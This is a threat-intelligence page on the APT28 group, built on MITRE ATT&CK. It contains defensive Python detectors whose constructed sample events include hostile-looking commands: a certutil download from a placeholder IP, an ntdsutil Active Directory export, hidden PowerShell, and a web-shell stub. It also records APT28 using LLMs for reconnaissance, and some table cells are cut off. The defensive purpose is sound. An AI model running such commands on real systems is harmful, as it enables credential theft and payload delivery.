G0007: APT28
APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.[1][2] This group has been active since at least 2004.[3][4][5][6][7][8][9][10][11][12][13]
APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.[5] In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.[14] Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
Analyst context for executives and security teams
APT28 matters because ATT&CK describes a long-running, state-attributed intrusion set with documented operations against political, international, scientific, and other sensitive organizations. For leaders, the practical issue is not the name itself; it is whether the organization can withstand credential theft, living-off-the-land activity, malware across multiple endpoint types, cloud/enterprise account attacks, and even close-access or nearby Wi-Fi enabled intrusion paths when the target is strategically interesting.
Executive priority
Treat APT28 as a planning scenario for high-consequence intrusion readiness: executive teams should ask whether identity controls, cloud authentication evidence, endpoint visibility, remote access monitoring, and incident response playbooks can support fast decisions during a suspected espionage or targeted intrusion. The relationship set includes credential tools, backdoors, proxy tooling, Windows utilities, macOS malware, Linux-capable malware, and an Android malware reference, so budget and assurance discussions should focus on coverage across identity, endpoint, network, and cloud—not only perimeter prevention.
Technical view
ATT&CK does not provide a group-level detection section or group-level platforms/tactics for this object, so SOC and IR validation should be driven by the related software and campaign context. Confirm monitoring for credential dumping and harvesting behaviors associated with Mimikatz and OLDBAIT; native administrative and living-off-the-land utility use such as Net, certutil, and Forfiles; remote execution and post-exploitation frameworks such as Winexe and Koadic; backdoor/downloader families including CHOPSTICK, ADVSTORESHELL, Downdelph, CORESHELL, Zebrocy, Cannon, XAgentOSX, and Komplex; proxy/anonymity tooling such as XTunnel and Tor; and removable-media or air-gapped collection risk associated with USBStealer. The C0051 relationship (the APT28 Nearest Neighbor Campaign) adds a useful readiness check for nearby Wi-Fi exposure, living-off-the-land tradecraft, and vulnerability response around CVE-2022-38028 in the historical campaign context supplied by ATT&CK.
Likely telemetry
- Identity and authentication logs, including failed/successful login patterns and cloud authentication records where available
- Endpoint process creation and command-line telemetry for Windows administrative utilities and scripting/post-exploitation frameworks
- Credential access signals from Windows hosts, including suspicious access to credential material and known credential dumping tool detections
- Network connection, proxy, DNS, and egress telemetry for unusual tunneling, Tor use, or C2-like communications
- EDR/AV detections and file telemetry for related malware families and downloaders
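The process-creation telemetry above is only useful if something scores it with context. The following is an added example, not code from ATT&CK, the cited advisories, or this page: it evaluates constructed Windows process-creation events (Sysmon Event ID 1 style fields) against the utility behaviours the techniques table attributes to APT28, such as ntdsutil export of the AD database, certutil download or decode, forfiles as a launcher, rundll32 loading a DLL from outside the system directories, and hidden-window PowerShell. The field names, rule scores, parent-process and host-role adjustments, and the sample events are all assumptions to be mapped to your own EDR schema and baseline.

```python
"""Score Windows process-creation events for living-off-the-land patterns.

Added example; event schema, scores and sample events are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class Event:
    image: str          # full path of the created process
    command_line: str
    parent_image: str
    user: str
    host_role: str      # constructed label: "dc", "server" or "workstation"


@dataclass
class Finding:
    rule: str
    score: int
    reasons: list = field(default_factory=list)


# (rule name, image basename, case-insensitive command-line regex, base score)
RULES = [
    ("ntdsutil_ad_export", "ntdsutil.exe",
     r"\b(ac\s+i\s+ntds|activate\s+instance\s+ntds|ifm|create\s+full)\b", 80),
    ("certutil_download_or_decode", "certutil.exe",
     r"(-urlcache|-decode|-encode|-verifyctl)", 60),
    ("forfiles_proxy_exec", "forfiles.exe", r"/c\s+", 50),
    ("rundll32_dll_load", "rundll32.exe", r"\.dll\b", 40),
    ("powershell_hidden_window", "powershell.exe",
     r"-(w|windowstyle)\s+hidden|-enc(odedcommand)?\s", 50),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: Event) -> Optional[Finding]:
    """Return a Finding for the first matching rule, adjusted for context."""
    image = _basename(ev.image)
    for name, target, pattern, base in RULES:
        if image != target or not re.search(pattern, ev.command_line, re.I):
            continue
        f = Finding(name, base, [f"matched {target} command line"])
        parent = _basename(ev.parent_image)
        if parent in OFFICE_PARENTS:                     # macro-launched utility
            f.score += 30; f.reasons.append(f"spawned by Office app {parent}")
        if name == "ntdsutil_ad_export" and ev.host_role != "dc":
            f.score += 20; f.reasons.append("ntdsutil outside a domain controller")
        if name == "rundll32_dll_load" and not re.search(
                r"\\(system32|syswow64)\\", ev.command_line, re.I):
            f.score += 20; f.reasons.append("DLL path outside system directories")
        if ev.user.endswith("$"):                         # machine account, often benign
            f.score -= 10; f.reasons.append("machine account context")
        return f
    return None


def run(events: List[Event]) -> List[Tuple[Event, Finding]]:
    return [(ev, f) for ev in events if (f := score_event(ev))]


SAMPLE_EVENTS = [  # constructed events, not real telemetry
    Event(r"C:\Windows\System32\ntdsutil.exe",
          'ntdsutil "ac i ntds" "ifm" "create full C:\\temp\\x" q q',
          r"C:\Windows\System32\cmd.exe", "CORP\\jdoe", "workstation"),
    Event(r"C:\Windows\System32\certutil.exe",
          "certutil -urlcache -split -f http://203.0.113.10/a.dat a.dat",
          r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          "CORP\\jdoe", "workstation"),
    Event(r"C:\Windows\System32\certutil.exe", "certutil -verify cert.cer",
          r"C:\Windows\System32\cmd.exe", "CORP\\admin", "server"),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -WindowStyle hidden -NoProfile -File C:\\Users\\Public\\u.ps1",
          r"C:\Windows\explorer.exe", "CORP\\jdoe", "workstation"),
    Event(r"C:\Windows\System32\ntdsutil.exe",
          'ntdsutil "ac i ntds" "ifm" "create full D:\\ifm" q q',
          r"C:\Windows\System32\cmd.exe", "CORP\\DC01$", "dc"),
    Event(r"C:\Windows\System32\rundll32.exe",
          r"rundll32.exe C:\Users\Public\x.dll,Run",
          r"C:\Windows\System32\cmd.exe", "CORP\\jdoe", "workstation"),
]

if __name__ == "__main__":
    for ev, f in run(SAMPLE_EVENTS):
        print(f"{f.score:3d} {f.rule:28s} {ev.command_line[:60]} :: {'; '.join(f.reasons)}")
```

The scores are deliberately additive so that the same certutil command ranks higher when Word is the parent, and the legitimate `ntdsutil` run on a domain controller under its machine account ranks lowest; a real deployment would replace the constants with values calibrated against the environment's own baseline.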
Detection direction
- Map existing detections to the related ATT&CK software rather than relying on the APT28 name alone; the object has no official group-level detection guidance.
- Prioritize behavior-based analytics for credential access, suspicious administrative utility use, remote command execution, downloader/backdoor execution, and proxy/tunneling behavior.
- Tune living-off-the-land detections carefully: Net, certutil, Forfiles, Winexe, and similar tools may be legitimate, so detections should account for user, host role, parent process, command line, destination, timing, and change-control context.
- Validate identity and cloud log retention because the supplied references include a GRU brute-force campaign against enterprise and cloud environments; absence of these logs is a material blind spot.
- Assess wireless and physical-proximity logging for high-risk sites, since the related APT28 Nearest Neighbor Campaign describes use of nearby Wi-Fi networks to gain initial access.
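The identity-log check above is concrete enough to test. The following is an added example, not code from the advisory or this page: it parses a constructed authentication log and applies two analytics, a sliding-window count of failures per account using the rate the techniques table quotes for the tooling's brute-force mode (more than 300 attempts per hour per account), and a password-spray heuristic that looks for one source failing against many accounts with few attempts each. The log format, the spray thresholds, and the sample data are assumptions; the brute-force threshold is the page's figure.

```python
"""Flag brute-force and password-spray patterns in authentication logs.

Added example. Log lines are "ISO-timestamp,source_ip,user,RESULT"; the
sample log is constructed. Spray thresholds are assumptions to tune.
"""
from collections import defaultdict
from datetime import datetime, timedelta

BRUTE_FORCE_PER_HOUR = 300   # rate quoted on this page for brute-force mode
SPRAY_MIN_ACCOUNTS = 20      # assumption
SPRAY_MAX_PER_ACCOUNT = 5    # assumption


def parse(lines):
    """Return (timestamp, source_ip, user, result) tuples; users lower-cased."""
    events = []
    for line in lines:
        ts, ip, user, result = line.strip().split(",")
        events.append((datetime.fromisoformat(ts), ip, user.lower(), result))
    return events


def brute_force_accounts(events, window=timedelta(hours=1)):
    """Accounts exceeding BRUTE_FORCE_PER_HOUR failures in any sliding window."""
    by_user = defaultdict(list)
    for ts, _ip, user, result in events:
        if result == "FAIL":
            by_user[user].append(ts)
    hits = {}
    for user, stamps in by_user.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window forward
                start += 1
            count = end - start + 1
            if count > BRUTE_FORCE_PER_HOUR:
                hits[user] = max(hits.get(user, 0), count)
    return hits


def spray_sources(events):
    """Source IPs failing against many distinct accounts, few tries each."""
    per_src = defaultdict(lambda: defaultdict(int))
    for _ts, ip, user, result in events:
        if result == "FAIL":
            per_src[ip][user] += 1
    return {ip: len(users) for ip, users in per_src.items()
            if len(users) >= SPRAY_MIN_ACCOUNTS
            and max(users.values()) <= SPRAY_MAX_PER_ACCOUNT}


def build_sample():
    """Constructed log: one hammered account, one spraying source, some noise."""
    base = datetime(2021, 7, 1, 9, 0, 0)
    lines = []
    for i in range(320):                          # 320 failures within ~37 minutes
        t = base + timedelta(seconds=7 * i)
        lines.append(f"{t.isoformat()},198.51.100.7,ceo@example.org,FAIL")
    for i in range(25):                           # 25 accounts, 2 attempts each
        for j in range(2):
            t = base + timedelta(minutes=10 * i + j)
            lines.append(f"{t.isoformat()},203.0.113.9,user{i:02d}@example.org,FAIL")
    lines.append(f"{base.isoformat()},192.0.2.4,jdoe@example.org,FAIL")
    lines.append(f"{(base + timedelta(minutes=1)).isoformat()},192.0.2.4,jdoe@example.org,SUCCESS")
    return lines


if __name__ == "__main__":
    ev = parse(build_sample())
    print("brute force:", brute_force_accounts(ev))
    print("spray sources:", spray_sources(ev))
```

Run against real data, the spray rule needs the source field to survive whatever proxy or identity provider sits in front of the application; if cloud sign-in logs are not retained with client IP and result, neither analytic can be evaluated, which is the blind spot the bullet above describes.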
Mitigation priorities
- Start with identity hardening: strong MFA, reduced password reuse, monitoring of brute-force patterns, and rapid credential reset procedures for suspected compromise.
- Harden and monitor administrative tooling rather than attempting to block every native utility; restrict unnecessary remote administration paths and require privileged activity logging.
- Maintain endpoint detection and response coverage across operating systems actually used by the organization, including Windows and any macOS/Linux populations reflected in the related software set.
- Segment sensitive environments and monitor removable-media use, especially where air-gapped, regulated, research, or operational systems exist.
- Include wireless security and physical proximity assumptions in risk reviews for sensitive sites, especially where nearby network access could create an initial-access path.
Analyst notes and limits
The ATT&CK object is a group profile, not a detection rule. Its value is in the relationship set: APT28 is connected to many tools and malware families, plus a campaign involving living-off-the-land techniques, CVE-2022-38028, and nearby Wi-Fi access. This supports a broad readiness assessment across identity, endpoint, cloud authentication evidence, network egress, vulnerability management, and site-level wireless controls.
No official group-level detection text, tactics, or platforms are provided for APT28 in the supplied fields. Platform observations come from related software objects, not from the group object itself. Local exposure, logging availability, control effectiveness, and relevance to a specific organization require environment-specific validation.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1003.003 | NTDS | APT28 has used the ntdsutil.exe utility to export the Active Directory database for credential access. (Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1589.001 | Credentials | APT28 has harvested users' login credentials. (Citation: Microsoft Targeting Elections September 2020) |
| Enterprise | T1591 | Gather Victim Org Information | APT28 has used large language models (LLMs) to gather information about satellite capabilities. (Citation: MSFT-AI)(Citation: OpenAI-CTI) |
| Enterprise | T1564.001 | Hidden Files and Directories | APT28 has saved files with hidden file attributes. (Citation: Talos Seduploader Oct 2017) |
| Enterprise | T1583.003 | Virtual Private Server | APT28 hosted phishing domains on free services for brief periods of time during campaigns. (Citation: Leonard TAG 2023) |
| Enterprise | T1596 | Search Open Technical Databases | APT28 has used large language models (LLMs) to assist in script development and deployment. (Citation: MSFT-AI)(Citation: OpenAI-CTI) |
| Enterprise | T1583.001 | Domains | APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations. (Citation: FireEye APT28)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Google TAG Ukraine Threat Landscape March 2022) |
| Enterprise | T1070.006 | Timestomp | APT28 has performed timestomping on victim files. (Citation: Crowdstrike DNC June 2016) |
| Enterprise | T1090.002 | External Proxy | APT28 used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. APT28 has also used a machine to relay and obscure communications between CHOPSTICK and their server. (Citation: FireEye APT28)(Citation: Bitdefender APT28 Dec 2015)(Citation: DOJ GRU Indictment Jul 2018) |
| Enterprise | T1566.001 | Spearphishing Attachment | APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments. (Citation: Unit 42 Sofacy Feb 2018)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)(Citation: Cato LAMEHUG JUL 2025) |
| Enterprise | T1059.001 | PowerShell | APT28 downloads and executes PowerShell scripts and performs PowerShell commands. (Citation: Palo Alto Sofacy 06-2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1048.002 | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS. (Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | APT28 has deployed malware that has copied itself to the startup directory for persistence. (Citation: TrendMicro Pawn Storm Dec 2020) |
| Enterprise | T1027.013 | Encrypted/Encoded File | APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4. (Citation: Bitdefender APT28 Dec 2015)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Palo Alto Sofacy 06-2018)(Citation: Talos Seduploader Oct 2017)(Citation: Accenture SNAKEMACKEREL Nov 2018) |
| Enterprise | T1203 | Exploitation for Client Execution | APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution. (Citation: Securelist Sofacy Feb 2018) |
| Enterprise | T1586.002 | Email Accounts | APT28 has used compromised email accounts to send credential phishing emails. (Citation: Google TAG Ukraine Threat Landscape March 2022) |
| Enterprise | T1114.002 | Remote Email Collection | APT28 has collected emails from victim Microsoft Exchange servers. (Citation: DOJ GRU Indictment Jul 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1505.003 | Web Shell | APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server. (Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1584.008 | Network Devices | APT28 compromised Ubiquiti network devices to act as collection devices for credentials compromised via phishing webpages. (Citation: Leonard TAG 2023) |
| Enterprise | T1550.002 | Pass the Hash | APT28 has used pass the hash for lateral movement. (Citation: Microsoft SIR Vol 19) |
| Enterprise | T1037.001 | Logon Script (Windows) | An APT28 loader Trojan adds the Registry key |
| Enterprise | T1588.002 | Tool | |
| Enterprise | T1564.003 | Hidden Window | APT28 has used the WindowStyle parameter to conceal PowerShell windows. (Citation: Palo Alto Sofacy 06-2018)(Citation: McAfee APT28 DDE1 Nov 2017) |
| Enterprise | T1090.003 | Multi-hop Proxy | |
| Enterprise | T1567 | Exfiltration Over Web Service | APT28 can exfiltrate data over Google Drive. (Citation: TrendMicro Pawn Storm Dec 2020) |
| Enterprise | T1056.001 | Keylogging | APT28 has used tools to perform keylogging. (Citation: Microsoft SIR Vol 19)(Citation: DOJ GRU Indictment Jul 2018)(Citation: TrendMicro Pawn Storm Dec 2020) |
| Enterprise | T1083 | File and Directory Discovery | |
| Enterprise | T1190 | Exploit Public-Facing Application | APT28 has used a variety of public exploits, including CVE-2020-0688 and CVE-2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites. (Citation: US District Court Indictment GRU Oct 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1669 | Wi-Fi Networks | APT28 has exploited open Wi-Fi access points for initial access to target devices using the network. (Citation: Nearest Neighbor Volexity)(Citation: DOJ GRU Charges 2018) |
| Enterprise | T1039 | Data from Network Shared Drive | APT28 has collected files from network shared drives. (Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1113 | Screen Capture | APT28 has used tools to take screenshots from victims. (Citation: ESET Sednit Part 2)(Citation: XAgentOSX 2017)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017) |
| Enterprise | T1110.001 | Password Guessing | APT28 has used brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days. (Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020) APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks. (Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1583.006 | Web Services | APT28 has used newly-created Blogspot pages for credential harvesting operations. (Citation: Google TAG Ukraine Threat Landscape March 2022) |
| Enterprise | T1057 | Process Discovery | An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions. (Citation: Unit 42 Playbook Dec 2017) |
| Enterprise | T1189 | Drive-by Compromise | |
| Enterprise | T1595.002 | Vulnerability Scanning | APT28 has performed large-scale scans in an attempt to find vulnerable servers. (Citation: TrendMicro Pawn Storm 2019) |
| Enterprise | T1546.015 | Component Object Model Hijacking | APT28 has used COM hijacking for persistence by replacing the legitimate |
| Enterprise | T1199 | Trusted Relationship | Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network. (Citation: DOJ GRU Indictment Jul 2018) |
| Enterprise | T1120 | Peripheral Device Discovery | APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim. (Citation: Microsoft SIR Vol 19) |
| Enterprise | T1059.003 | Windows Command Shell | An APT28 loader Trojan uses a cmd.exe and batch script to run its payload. (Citation: Unit 42 Playbook Dec 2017) The group has also used macros to execute payloads. (Citation: Talos Seduploader Oct 2017)(Citation: Unit42 Cannon Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: TrendMicro Pawn Storm Dec 2020) |
| Enterprise | T1557.004 | Evil Twin | APT28 has used a Wi-Fi Pineapple to set up Evil Twin Wi-Fi Poisoning for the purposes of capturing victim credentials or planting espionage-oriented malware. (Citation: US District Court Indictment GRU Oct 2018) |
| Enterprise | T1498 | Network Denial of Service | In 2016, APT28 conducted a distributed denial of service (DDoS) attack against the World Anti-Doping Agency. (Citation: US District Court Indictment GRU Oct 2018) |
| Enterprise | T1070.004 | File Deletion | APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner. (Citation: DOJ GRU Indictment Jul 2018) |
| Enterprise | T1560 | Archive Collected Data | APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks. (Citation: DOJ GRU Indictment Jul 2018) |
| Enterprise | T1105 | Ingress Tool Transfer | APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant. (Citation: Bitdefender APT28 Dec 2015)(Citation: Unit 42 Playbook Dec 2017)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1598 | Phishing for Information | APT28 has used spearphishing to compromise credentials. (Citation: Microsoft Targeting Elections September 2020)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017) |
| Enterprise | T1559.002 | Dynamic Data Exchange | |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location | APT28 has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page. (Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1119 | Automated Collection | APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks. (Citation: DOJ GRU Indictment Jul 2018) |
| Enterprise | T1078.004 | Cloud Accounts | APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes. (Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1221 | Template Injection | APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro. (Citation: Unit42 Sofacy Dec 2018) |
| Enterprise | T1005 | Data from Local System | APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration. (Citation: Überwachung APT28 Forfiles June 2015)(Citation: DOJ GRU Indictment Jul 2018)(Citation: TrendMicro Pawn Storm 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1213.002 | Sharepoint | APT28 has collected information from Microsoft SharePoint services within target networks. (Citation: RSAC 2015 Abu Dhabi Stefano Maccaglia) |
| Enterprise | T1078 | Valid Accounts | APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder. (Citation: Trend Micro Pawn Storm April 2017)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1025 | Data from Removable Media | An APT28 backdoor may collect the entire contents of an inserted USB device. (Citation: Microsoft SIR Vol 19) |
| Enterprise | T1071.001 | Web Protocols | |
| Enterprise | T1213 | Data from Information Repositories | APT28 has collected files from various information repositories. (Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1218.011 | Rundll32 | APT28 executed CHOPSTICK by using rundll32 commands such as |
| Enterprise | T1560.001 | Archive via Utility | APT28 has used a variety of utilities, including WinRAR, to archive collected data with password protection. (Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | An APT28 macro uses the command |
| Enterprise | T1598.003 | Spearphishing Link | APT28 has conducted credential phishing campaigns with links that redirect to credential harvesting sites. (Citation: Google TAG Ukraine Threat Landscape March 2022)(Citation: DOJ GRU Indictment Jul 2018)(Citation: ESET Zebrocy May 2019)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017) |
| Enterprise | T1542.003 | Bootkit | APT28 has deployed a bootkit along with Downdelph to ensure its persistence on the victim. The bootkit shares code with some variants of BlackEnergy. (Citation: ESET Sednit Part 3) |
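The T1505.003 and T1036.005 rows describe a web shell placed on an OWA server and renamed to look like a legitimate OWA page. Signature matching is weak against a modified, obfuscated shell, so the practical control is an integrity baseline of the web root: script files in that tree should only change during patching. The following is an added example, not code from the advisory or this page: it snapshots SHA-256 hashes of server-side script files under a directory, diffs a later snapshot against the saved baseline, and only then applies a small content heuristic to the added or modified files. The directory layout, file contents, and suspicious-token list are constructed assumptions.

```python
"""Baseline-diff check for new or modified script files in a web root.

Added example; paths, file contents and the token list are constructed.
"""
import hashlib
import json
import os
import re
import tempfile

SCRIPT_EXT = {".aspx", ".ashx", ".asmx", ".asp", ".php"}
# Tokens common to server-side shells. An obfuscated shell may avoid all of
# them, which is why the baseline diff, not this list, is the primary signal.
SUSPICIOUS = re.compile(r"Process\.Start|cmd\.exe|Request\.Headers|eval\(", re.I)


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str) -> dict:
    """Map relative path -> sha256 for every script file under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXT:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                snap[rel] = sha256_file(full)
    return snap


def save_baseline(root: str, baseline_path: str) -> None:
    with open(baseline_path, "w") as f:
        json.dump(snapshot(root), f)


def check(root: str, baseline_path: str) -> dict:
    """Return added, modified and content-suspicious script paths."""
    with open(baseline_path) as f:
        baseline = json.load(f)
    current = snapshot(root)
    added = sorted(p for p in current if p not in baseline)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    suspicious = []
    for rel in added + modified:
        with open(os.path.join(root, rel), "r", errors="replace") as f:
            if SUSPICIOUS.search(f.read()):
                suspicious.append(rel)
    return {"added": added, "modified": modified, "suspicious": suspicious}


def demo() -> dict:
    """Constructed OWA-like tree: take a baseline, then drop a renamed shell."""
    with tempfile.TemporaryDirectory() as root:
        auth_dir = os.path.join(root, "owa", "auth")
        os.makedirs(auth_dir)
        with open(os.path.join(auth_dir, "logon.aspx"), "w") as f:
            f.write('<%@ Page Language="C#" %><html>logon</html>')
        baseline = os.path.join(root, "baseline.json")   # .json is not a script ext
        save_baseline(root, baseline)
        # Constructed shell content under a benign-looking page name.
        with open(os.path.join(auth_dir, "logon_ex.aspx"), "w") as f:
            f.write('<%@ Page Language="C#" %><% var c = Request.Headers["X-Cmd"]; %>')
        return check(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The baseline must be captured from a known-good state and re-captured after every Exchange update, and it should be stored off the server, since an adversary with write access to the web root can equally overwrite a baseline kept beside it.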
Groups, software, and campaigns
S0645: Wevtutil
S0160: certutil
S0023: CHOPSTICK
CHOPSTICK is a malware family of modular backdoors used by APT28. It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. [1] [2] [3] [4] It is tracked separately from the X-Agent for Android.
S0039: Net
The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [1]
Net has a great deal of functionality, [2] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through SMB/Windows Admin Shares using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.
S0193: Forfiles
Forfiles is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. [1]
S0243: DealersChoice
DealersChoice is a Flash exploitation framework used by APT28. [1]
S0002: Mimikatz
S0045: ADVSTORESHELL
ADVSTORESHELL is a spying backdoor that has been used by APT28 from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. [1] [2]
S0351: Cannon
S0162: Komplex
S0135: HIDEDRV
S0044: JHUHUGIT
Object version and sync metadata
The fields below describe the mirrored ATT&CK snapshot of this object. Where several ATT&CK source imports are retained, the same object can be compared across releases by hash and MITRE modification timestamp. For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 5.3 | | Current bundle | 1d743dbb2ee5… |
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] NSA/FBI Drovorub August 2020: NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
- [2] Cybersecurity Advisory GRU Brute Force Campaign July 2021: NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
- [3] DOJ GRU Indictment Jul 2018: Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024.
- [4] Ars Technica GRU indictment Jul 2018: Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
- [5] Crowdstrike DNC June 2016: Alperovitch, D. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
- [6] FireEye APT28: FireEye. (2015). APT28: A WINDOW INTO RUSSIA'S CYBER ESPIONAGE OPERATIONS? Retrieved August 19, 2015.
- [7] SecureWorks TG-4127: SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
- [8] FireEye APT28 January 2017: FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024.
- [9] GRIZZLY STEPPE JAR: Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
- [10] Sofacy DealersChoice: Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
- [11] Palo Alto Sofacy 06-2018: Lee, B., Falcone, R. (2018, June 06). Sofacy Group's Parallel Attacks. Retrieved June 18, 2018.
